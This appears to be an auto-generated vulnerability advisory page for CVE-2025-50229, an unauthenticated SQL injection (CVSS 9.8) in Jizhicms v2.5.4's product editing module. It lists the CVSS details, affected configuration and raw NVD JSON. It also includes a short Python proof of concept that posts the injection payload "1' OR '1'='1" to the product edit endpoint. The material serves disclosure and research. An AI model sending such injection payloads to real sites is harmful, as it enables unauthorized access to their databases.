Security Vulnerability Report
中文
CVE-2025-50229 CVSS 9.8 CRITICAL

CVE-2025-50229

Published: 2026-04-23 16:16:24
Last Modified: 2026-04-27 18:24:46

Description

Jizhicms v2.5.4 is vulnerable to SQL injection in the product editing module.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:jizhicms:jizhicms:2.5.4:*:*:*:*:*:*:* - VULNERABLE
Jizhicms 2.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2025-50229 # Target the product editing module url = "http://example.com/index.php/product/edit" # Malicious payload to test SQL Injection # Attempting to bypass logic or extract data payload = { "id": "1' OR '1'='1", # Basic logic test "name": "test" } try: response = requests.post(url, data=payload) if "error" not in response.text.lower() and response.status_code == 200: print("[!] Potential Vulnerability Detected") print("Response:", response.text[:100]) except Exception as e: print("Connection Error:", e)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50229", "sourceIdentifier": "[email protected]", "published": "2026-04-23T16:16:23.593", "lastModified": "2026-04-27T18:24:45.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jizhicms v2.5.4 is vulnerable to SQL injection in the product editing module."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jizhicms:jizhicms:2.5.4:*:*:*:*:*:*:*", "matchCriteriaId": "3A6DA195-4F19-4389-A7AE-D6782136A2A8"}]}]}], "references": [{"url": "http://jizhicms.cn", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://gist.github.com/4iFei/14ad89c3b44348dd575bf5ae0ed5a19c", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/Cherry-toto/jizhicms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Cherry-toto/jizhicms/issues/105", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/Cherry-toto/jizhicms/issues/105", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}